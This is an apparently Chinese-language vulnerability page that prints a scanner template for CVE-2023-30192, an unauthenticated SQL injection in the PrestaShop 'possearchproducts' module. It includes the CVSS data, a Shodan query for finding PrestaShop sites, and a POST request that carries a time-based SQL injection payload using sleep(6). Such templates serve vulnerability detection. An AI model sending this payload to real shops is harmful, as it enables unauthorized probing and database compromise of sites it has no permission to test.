漏洞描述
In the module “Search Products” (possearchproducts) from PosThemes for PrestaShop, a guest can perform SQL injection in affected versions.
CVE-2023-30192: PrestaShop 'possearchproducts' <= 1.7 - SQL Injection
PoC代码[已公开]
id: CVE-2023-30192
info:
name: PrestaShop 'possearchproducts' <= 1.7 - SQL Injection
author: mastercho
severity: critical
description: |
In the module “Search Products” (possearchproducts) from PosThemes for PrestaShop, a guest can perform SQL injection in affected versions.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the PrestaShop application and its underlying database.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-30192
- https://security.friendsofpresta.org/modules/2023/05/11/possearchproducts.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-30192
cwe-id: CWE-89
epss-score: 0.50165
epss-percentile: 0.9776
metadata:
verified: true
max-request: 2
product: possearchproducts
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,prestashop,sqli,time-based-sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
matchers:
- type: dsl
dsl:
- 'contains_any(tolower(response), "prestashop", "possearchproducts")'
internal: true
- raw:
- |
@timeout: 20s
POST /modules/possearchproducts/SearchProducts.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id_category=10*if(now()=sysdate()%2Csleep(6)%2C0)&id_lang=3&resultsPerPage=10&s=the
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(tolower(response), "products")'
- 'status_code != 404'
condition: and
# digest: 4a0a00473045022039fde40896849b9cfd158cd057726a2f735df8f2dd6a5a0713a1f12c6075ee52022100bc7919b529a7a72d743f14038f319ea99a5d3e78824922a9dda1c757398c0c66:922c64590222798bb761d5b6d8e72950